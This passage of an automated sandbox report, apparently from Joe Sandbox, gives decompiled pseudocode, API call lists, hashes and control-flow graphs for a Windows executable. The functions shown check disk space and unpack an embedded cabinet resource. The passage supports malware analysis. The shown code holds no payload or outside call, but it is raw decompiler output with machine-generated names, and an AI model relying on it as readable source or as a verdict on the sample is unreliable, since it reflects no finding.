                                                                                                                                                                                                      				int _t69;
                                                                                                                                                                                                      				signed int _t73;
                                                                                                                                                                                                      				signed short _t78;
                                                                                                                                                                                                      				signed int _t87;
                                                                                                                                                                                                      				signed int _t101;
                                                                                                                                                                                                      				int _t102;
                                                                                                                                                                                                      				unsigned int _t103;
                                                                                                                                                                                                      				unsigned int _t105;
                                                                                                                                                                                                      				signed int _t111;
                                                                                                                                                                                                      				long _t112;
                                                                                                                                                                                                      				signed int _t116;
                                                                                                                                                                                                      				CHAR* _t118;
                                                                                                                                                                                                      				signed int _t119;
                                                                                                                                                                                                      				signed int _t120;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t114 = __edi;
                                                                                                                                                                                                      				_t46 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                      				_v804 = __edx;
                                                                                                                                                                                                      				_t118 = __ecx;
                                                                                                                                                                                                      				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                      				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                      				if(_t50 != 0) {
                                                                                                                                                                                                      					_push(__edi);
                                                                                                                                                                                                      					_v796 = 0;
                                                                                                                                                                                                      					_v792 = 0;
                                                                                                                                                                                                      					_v800 = 0;
                                                                                                                                                                                                      					_v808 = 0;
                                                                                                                                                                                                      					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                      					__eflags = _t55;
                                                                                                                                                                                                      					if(_t55 == 0) {
                                                                                                                                                                                                      						L29:
                                                                                                                                                                                                      						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                      						 *0xe9124 = E000E6285();
                                                                                                                                                                                                      						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                      						_t110 = 0x4b0;
                                                                                                                                                                                                      						L30:
                                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                                      						E000E44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                      						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                      						L31:
                                                                                                                                                                                                      						_t66 = 0;
                                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                                      						L32:
                                                                                                                                                                                                      						_pop(_t114);
                                                                                                                                                                                                      						goto L33;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t69 = _v792 * _v796;
                                                                                                                                                                                                      					_v812 = _t69;
                                                                                                                                                                                                      					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                      					__eflags = _t116;
                                                                                                                                                                                                      					if(_t116 == 0) {
                                                                                                                                                                                                      						goto L29;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                      					__eflags = _t73;
                                                                                                                                                                                                      					if(_t73 != 0) {
                                                                                                                                                                                                      						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                      						_t101 =  &_v16;
                                                                                                                                                                                                      						_t111 = 6;
                                                                                                                                                                                                      						_t119 = _t118 - _t101;
                                                                                                                                                                                                      						__eflags = _t119;
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                      							__eflags = _t22;
                                                                                                                                                                                                      							if(_t22 == 0) {
                                                                                                                                                                                                      								break;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                      							__eflags = _t87;
                                                                                                                                                                                                      							if(_t87 == 0) {
                                                                                                                                                                                                      								break;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *_t101 = _t87;
                                                                                                                                                                                                      							_t101 = _t101 + 1;
                                                                                                                                                                                                      							_t111 = _t111 - 1;
                                                                                                                                                                                                      							__eflags = _t111;
                                                                                                                                                                                                      							if(_t111 != 0) {
                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t111;
                                                                                                                                                                                                      						if(_t111 == 0) {
                                                                                                                                                                                                      							_t101 = _t101 - 1;
                                                                                                                                                                                                      							__eflags = _t101;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *_t101 = 0;
                                                                                                                                                                                                      						_t112 = 0x200;
                                                                                                                                                                                                      						_t102 = _v812;
                                                                                                                                                                                                      						_t78 = 0;
                                                                                                                                                                                                      						_t118 = 8;
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							__eflags = _t102 - _t112;
                                                                                                                                                                                                      							if(_t102 == _t112) {
                                                                                                                                                                                                      								break;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t112 = _t112 + _t112;
                                                                                                                                                                                                      							_t78 = _t78 + 1;
                                                                                                                                                                                                      							__eflags = _t78 - _t118;
                                                                                                                                                                                                      							if(_t78 < _t118) {
                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t78 - _t118;
                                                                                                                                                                                                      						if(_t78 != _t118) {
                                                                                                                                                                                                      							__eflags =  *0xe9a34 & 0x00000008;
                                                                                                                                                                                                      							if(( *0xe9a34 & 0x00000008) == 0) {
                                                                                                                                                                                                      								L20:
                                                                                                                                                                                                      								_t103 =  *0xe9a38; // 0x0
                                                                                                                                                                                                      								_t110 =  *((intOrPtr*)(0xe89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                      								L21:
                                                                                                                                                                                                      								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                      								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                      									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                      									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                      										__eflags = _t103 - _t116;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										__eflags = _t110 - _t116;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if(__eflags <= 0) {
                                                                                                                                                                                                      									 *0xe9124 = 0;
                                                                                                                                                                                                      									_t66 = 1;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t66 = E000E268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                      							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t105 =  *0xe9a38; // 0x0
                                                                                                                                                                                                      							_t110 =  *((intOrPtr*)(0xe89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xe89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                      							_t103 = (_t105 >> 2) +  *0xe9a38;
                                                                                                                                                                                                      							goto L21;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t110 = 0x4c5;
                                                                                                                                                                                                      						E000E44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						goto L31;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                      					 *0xe9124 = E000E6285();
                                                                                                                                                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                      					_t110 = 0x4f9;
                                                                                                                                                                                                      					goto L30;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t110 = 0x4bc;
                                                                                                                                                                                                      					E000E44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					 *0xe9124 = E000E6285();
                                                                                                                                                                                                      					_t66 = 0;
                                                                                                                                                                                                      					L33:
                                                                                                                                                                                                      					return E000E6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}



































                                                                                                                                                                                                      0x000e597d
                                                                                                                                                                                                      0x000e5988
                                                                                                                                                                                                      0x000e598f
                                                                                                                                                                                                      0x000e599a
                                                                                                                                                                                                      0x000e59a6
                                                                                                                                                                                                      0x000e59a8
                                                                                                                                                                                                      0x000e59af
                                                                                                                                                                                                      0x000e59b9
                                                                                                                                                                                                      0x000e59dd
                                                                                                                                                                                                      0x000e59e4
                                                                                                                                                                                                      0x000e59f1
                                                                                                                                                                                                      0x000e59fe
                                                                                                                                                                                                      0x000e5a0b
                                                                                                                                                                                                      0x000e5a13
                                                                                                                                                                                                      0x000e5a19
                                                                                                                                                                                                      0x000e5a1b
                                                                                                                                                                                                      0x000e5ba1
                                                                                                                                                                                                      0x000e5baf
                                                                                                                                                                                                      0x000e5bbd
                                                                                                                                                                                                      0x000e5bd8
                                                                                                                                                                                                      0x000e5bde
                                                                                                                                                                                                      0x000e5be3
                                                                                                                                                                                                      0x000e5bec
                                                                                                                                                                                                      0x000e5bf0
                                                                                                                                                                                                      0x000e5bfc
                                                                                                                                                                                                      0x000e5c02
                                                                                                                                                                                                      0x000e5c02
                                                                                                                                                                                                      0x000e5c02
                                                                                                                                                                                                      0x000e5c04
                                                                                                                                                                                                      0x000e5c04
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5c04
                                                                                                                                                                                                      0x000e5a27
                                                                                                                                                                                                      0x000e5a3a
                                                                                                                                                                                                      0x000e5a46
                                                                                                                                                                                                      0x000e5a48
                                                                                                                                                                                                      0x000e5a4a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5a64
                                                                                                                                                                                                      0x000e5a6a
                                                                                                                                                                                                      0x000e5a6c
                                                                                                                                                                                                      0x000e5abc
                                                                                                                                                                                                      0x000e5ac2
                                                                                                                                                                                                      0x000e5ac9
                                                                                                                                                                                                      0x000e5aca
                                                                                                                                                                                                      0x000e5aca
                                                                                                                                                                                                      0x000e5acc
                                                                                                                                                                                                      0x000e5acc
                                                                                                                                                                                                      0x000e5acf
                                                                                                                                                                                                      0x000e5ad1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5ad3
                                                                                                                                                                                                      0x000e5ad6
                                                                                                                                                                                                      0x000e5ad8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5ada
                                                                                                                                                                                                      0x000e5adc
                                                                                                                                                                                                      0x000e5add
                                                                                                                                                                                                      0x000e5add
                                                                                                                                                                                                      0x000e5ae0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5ae0
                                                                                                                                                                                                      0x000e5ae2
                                                                                                                                                                                                      0x000e5ae4
                                                                                                                                                                                                      0x000e5ae6
                                                                                                                                                                                                      0x000e5ae6
                                                                                                                                                                                                      0x000e5ae6
                                                                                                                                                                                                      0x000e5ae9
                                                                                                                                                                                                      0x000e5aeb
                                                                                                                                                                                                      0x000e5af0
                                                                                                                                                                                                      0x000e5af6
                                                                                                                                                                                                      0x000e5af8
                                                                                                                                                                                                      0x000e5af9
                                                                                                                                                                                                      0x000e5af9
                                                                                                                                                                                                      0x000e5afb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5afd
                                                                                                                                                                                                      0x000e5aff
                                                                                                                                                                                                      0x000e5b00
                                                                                                                                                                                                      0x000e5b03
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5b03
                                                                                                                                                                                                      0x000e5b05
                                                                                                                                                                                                      0x000e5b08
                                                                                                                                                                                                      0x000e5b20
                                                                                                                                                                                                      0x000e5b27
                                                                                                                                                                                                      0x000e5b52
                                                                                                                                                                                                      0x000e5b52
                                                                                                                                                                                                      0x000e5b5b
                                                                                                                                                                                                      0x000e5b62
                                                                                                                                                                                                      0x000e5b6b
                                                                                                                                                                                                      0x000e5b6d
                                                                                                                                                                                                      0x000e5b76
                                                                                                                                                                                                      0x000e5b7d
                                                                                                                                                                                                      0x000e5b83
                                                                                                                                                                                                      0x000e5b7f
                                                                                                                                                                                                      0x000e5b7f
                                                                                                                                                                                                      0x000e5b7f
                                                                                                                                                                                                      0x000e5b6f
                                                                                                                                                                                                      0x000e5b72
                                                                                                                                                                                                      0x000e5b72
                                                                                                                                                                                                      0x000e5b85
                                                                                                                                                                                                      0x000e5b98
                                                                                                                                                                                                      0x000e5b9e
                                                                                                                                                                                                      0x000e5b87
                                                                                                                                                                                                      0x000e5b8f
                                                                                                                                                                                                      0x000e5b8f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5b85
                                                                                                                                                                                                      0x000e5b29
                                                                                                                                                                                                      0x000e5b33
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5b35
                                                                                                                                                                                                      0x000e5b48
                                                                                                                                                                                                      0x000e5b4a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5b4a
                                                                                                                                                                                                      0x000e5b0f
                                                                                                                                                                                                      0x000e5b16
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5b16
                                                                                                                                                                                                      0x000e5a7c
                                                                                                                                                                                                      0x000e5a8a
                                                                                                                                                                                                      0x000e5aa5
                                                                                                                                                                                                      0x000e5aab
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e59bb
                                                                                                                                                                                                      0x000e59c0
                                                                                                                                                                                                      0x000e59c7
                                                                                                                                                                                                      0x000e59d1
                                                                                                                                                                                                      0x000e59d6
                                                                                                                                                                                                      0x000e5c05
                                                                                                                                                                                                      0x000e5c14
                                                                                                                                                                                                      0x000e5c14

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 000E59A8
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(?), ref: 000E59AF
                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 000E5A13
                                                                                                                                                                                                      • MulDiv.KERNEL32(?,?,00000400), ref: 000E5A40
                                                                                                                                                                                                      • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 000E5A64
                                                                                                                                                                                                      • memset.MSVCRT ref: 000E5A7C
                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 000E5A98
                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 000E5AA5
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 000E5BFC
                                                                                                                                                                                                        • Part of subcall function 000E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000E4518
                                                                                                                                                                                                        • Part of subcall function 000E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000E4554
                                                                                                                                                                                                        • Part of subcall function 000E6285: GetLastError.KERNEL32(000E5BBC), ref: 000E6285
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4237285672-0
                                                                                                                                                                                                      • Opcode ID: a10915e9769a6a47613e2cc318209af14e7b08968fd29586171a1eadf983690a
                                                                                                                                                                                                      • Instruction ID: 8d3a2e2dd1ce24738ef3e8cac10b4db44b19b4e8e04f17e860468bd3a4252ded
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a10915e9769a6a47613e2cc318209af14e7b08968fd29586171a1eadf983690a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5771D1B1A0028CAFEB65DB21CCC5BFB77ACEB48745F1444A9F505B6181EB349E848B21
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 374 e4fe0-e501a call e468f FindResourceA LoadResource LockResource 377 e5020-e5027 374->377 378 e5161-e5163 374->378 379 e5029-e5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 e5057-e505e call e4efd 377->380 379->380 383 e507c-e50b4 380->383 384 e5060-e5077 call e44b9 380->384 389 e50e8-e5104 call e44b9 383->389 390 e50b6-e50da 383->390 388 e5107-e510e 384->388 392 e511d-e511f 388->392 393 e5110-e5117 FreeResource 388->393 398 e5106 389->398 390->398 402 e50dc 390->402 395 e513a-e5141 392->395 396 e5121-e5127 392->396 393->392 400 e515f 395->400 401 e5143-e514a 395->401 396->395 399 e5129-e5135 call e44b9 396->399 398->388 399->395 400->378 401->400 404 e514c-e5159 SendMessageA 401->404 405 e50e3-e50e6 402->405 404->400 405->389 405->398
                                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                                      			E000E4FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                      				struct HWND__* _t9;
                                                                                                                                                                                                      				int _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				struct HWND__* _t24;
                                                                                                                                                                                                      				struct HWND__* _t27;
                                                                                                                                                                                                      				intOrPtr _t29;
                                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                                      				int _t34;
                                                                                                                                                                                                      				CHAR* _t36;
                                                                                                                                                                                                      				int _t37;
                                                                                                                                                                                                      				intOrPtr _t47;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __edi;
                                                                                                                                                                                                      				_t36 = "CABINET";
                                                                                                                                                                                                      				 *0xe9144 = E000E468F(_t36, 0, 0);
                                                                                                                                                                                                      				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                      				 *0xe9140 = _t8;
                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                      					return _t8;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t9 =  *0xe8584; // 0x0
                                                                                                                                                                                                      				if(_t9 != 0) {
                                                                                                                                                                                                      					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                      					ShowWindow(GetDlgItem( *0xe8584, 0x841), 5);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t10 = E000E4EFD(0, 0);
                                                                                                                                                                                                      				if(_t10 != 0) {
                                                                                                                                                                                                      					__imp__#20(E000E4CA0, E000E4CC0, E000E4980, E000E4A50, E000E4AD0, E000E4B60, E000E4BC0, 1, 0xe9148, _t33);
                                                                                                                                                                                                      					_t34 = _t10;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                      						_t29 =  *0xe9148; // 0x0
                                                                                                                                                                                                      						_t24 =  *0xe8584; // 0x0
                                                                                                                                                                                                      						E000E44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_t37 = 0;
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__#22(_t34, "*MEMCAB", 0xe1140, 0, E000E4CD0, 0, 0xe9140); // executed
                                                                                                                                                                                                      					_t37 = _t10;
                                                                                                                                                                                                      					if(_t37 == 0) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__#23(_t34); // executed
                                                                                                                                                                                                      					if(_t10 != 0) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t27 =  *0xe8584; // 0x0
                                                                                                                                                                                                      					E000E44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					_t37 = 0;
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					_t12 =  *0xe9140; // 0x0
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						FreeResource(_t12);
                                                                                                                                                                                                      						 *0xe9140 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t37 == 0) {
                                                                                                                                                                                                      						_t47 =  *0xe91d8; // 0x0
                                                                                                                                                                                                      						if(_t47 == 0) {
                                                                                                                                                                                                      							E000E44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(( *0xe8a38 & 0x00000001) == 0 && ( *0xe9a34 & 0x00000001) == 0) {
                                                                                                                                                                                                      						SendMessageA( *0xe8584, 0xfa1, _t37, 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return _t37;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}
















                                                                                                                                                                                                      0x000e4fe0
                                                                                                                                                                                                      0x000e4fe6
                                                                                                                                                                                                      0x000e4ff9
                                                                                                                                                                                                      0x000e500d
                                                                                                                                                                                                      0x000e5013
                                                                                                                                                                                                      0x000e501a
                                                                                                                                                                                                      0x000e5163
                                                                                                                                                                                                      0x000e5163
                                                                                                                                                                                                      0x000e5020
                                                                                                                                                                                                      0x000e5027
                                                                                                                                                                                                      0x000e5037
                                                                                                                                                                                                      0x000e5051
                                                                                                                                                                                                      0x000e5051
                                                                                                                                                                                                      0x000e5057
                                                                                                                                                                                                      0x000e505e
                                                                                                                                                                                                      0x000e50a7
                                                                                                                                                                                                      0x000e50ad
                                                                                                                                                                                                      0x000e50b4
                                                                                                                                                                                                      0x000e50e8
                                                                                                                                                                                                      0x000e50e8
                                                                                                                                                                                                      0x000e50ee
                                                                                                                                                                                                      0x000e50ff
                                                                                                                                                                                                      0x000e5104
                                                                                                                                                                                                      0x000e5106
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5106
                                                                                                                                                                                                      0x000e50cd
                                                                                                                                                                                                      0x000e50d3
                                                                                                                                                                                                      0x000e50da
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e50dd
                                                                                                                                                                                                      0x000e50e6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5060
                                                                                                                                                                                                      0x000e5060
                                                                                                                                                                                                      0x000e5070
                                                                                                                                                                                                      0x000e5075
                                                                                                                                                                                                      0x000e5107
                                                                                                                                                                                                      0x000e5107
                                                                                                                                                                                                      0x000e510e
                                                                                                                                                                                                      0x000e5111
                                                                                                                                                                                                      0x000e5117
                                                                                                                                                                                                      0x000e5117
                                                                                                                                                                                                      0x000e511f
                                                                                                                                                                                                      0x000e5121
                                                                                                                                                                                                      0x000e5127
                                                                                                                                                                                                      0x000e5135
                                                                                                                                                                                                      0x000e5135
                                                                                                                                                                                                      0x000e5127
                                                                                                                                                                                                      0x000e5141
                                                                                                                                                                                                      0x000e5159
                                                                                                                                                                                                      0x000e5159
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e515f

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46A0
                                                                                                                                                                                                        • Part of subcall function 000E468F: SizeofResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46A9
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46C3
                                                                                                                                                                                                        • Part of subcall function 000E468F: LoadResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46CC
                                                                                                                                                                                                        • Part of subcall function 000E468F: LockResource.KERNEL32(00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46D3
                                                                                                                                                                                                        • Part of subcall function 000E468F: memcpy_s.MSVCRT ref: 000E46E5
                                                                                                                                                                                                        • Part of subcall function 000E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46EF
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 000E4FFE
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 000E5006
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 000E500D
                                                                                                                                                                                                      • GetDlgItem.USER32(00000000,00000842), ref: 000E5030
                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 000E5037
                                                                                                                                                                                                      • GetDlgItem.USER32(00000841,00000005), ref: 000E504A
                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 000E5051
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 000E5111
                                                                                                                                                                                                      • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 000E5159
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                      • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                      • API String ID: 1305606123-2642027498
                                                                                                                                                                                                      • Opcode ID: 95230e9cfdb0235169a2f436799eaff9ec6fca985ae71185f4fb260647927be4
                                                                                                                                                                                                      • Instruction ID: c14aeb2ce019a6e6faf4207b07d1ad4e21de4178bf6dd4c4cd944ad9d7d2fb1e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95230e9cfdb0235169a2f436799eaff9ec6fca985ae71185f4fb260647927be4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F83105B17407C16FF7205B63ADC9F67369CA709F5AF0444A8FA05BE2E1DABC9C008661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 406 e44b9-e44f8 407 e44fe-e4525 LoadStringA 406->407 408 e4679-e467b 406->408 409 e4527-e452e call e681f 407->409 410 e4562-e4568 407->410 411 e467c-e468c call e6ce0 408->411 418 e453f 409->418 419 e4530-e453d call e67c9 409->419 414 e456b-e4570 410->414 414->414 417 e4572-e457c 414->417 420 e457e-e4580 417->420 421 e45c9-e45cb 417->421 425 e4544-e4554 MessageBoxA 418->425 419->418 419->425 426 e4583-e4588 420->426 423 e45cd-e45cf 421->423 424 e4607-e4617 LocalAlloc 421->424 428 e45d2-e45d7 423->428 429 e455a-e455d 424->429 430 e461d-e4628 call e1680 424->430 425->429 426->426 431 e458a-e458c 426->431 428->428 433 e45d9-e45ed LocalAlloc 428->433 429->411 437 e462d-e463d MessageBeep call e681f 430->437 432 e458f-e4594 431->432 432->432 435 e4596-e45ad LocalAlloc 432->435 433->429 436 e45f3-e4605 call e171e 433->436 435->429 439 e45af-e45c7 call e171e 435->439 436->437 444 e464e 437->444 445 e463f-e464c call e67c9 437->445 439->437 448 e4653-e4677 MessageBoxA LocalFree 444->448 445->444 445->448 448->411
                                                                                                                                                                                                      C-Code - Quality: 94%
